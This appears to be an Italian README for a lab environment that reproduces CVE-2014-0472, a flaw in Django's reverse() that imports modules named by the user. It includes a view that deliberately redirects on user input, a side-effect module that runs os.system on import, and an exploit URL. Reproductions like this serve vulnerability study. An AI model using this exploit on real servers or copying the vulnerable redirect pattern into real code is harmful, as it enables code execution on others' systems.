
CVE-2014-0472 Django esecuzione di codice imprevista tramite reverse()
Usa
docker-compose up -d
Accedi a localhost:8083
Riferimento: https://www.djangoproject.com/weblog/2014/apr/21/security/
- Sono presenti una o più viste che costruiscono un URL basato sull'input dell'utente (comunemente, un parametro "next" in una querystring che indica dove reindirizzare al completamento con successo di un'azione).
- Uno o più moduli, noti a un attaccante come esistenti sul percorso di import Python del server, eseguono codice con effetti collaterali all'importazione.
In tests.py
def evil_function():
print("exploit successful")
os.system("echo > /tmp/`whoami` ")
return os.getuid()
evil = evil_function()
In views.py
def redirect_test(request):
page = request.GET.get('page', None)
if page is not None:
redirect(page)
return HttpResponse("OK")
Usa la funzione redirect per chiamare la funzione evil

Usa exp
http://your-ip:8083/example?page=app.tests.evil

Sfruttato
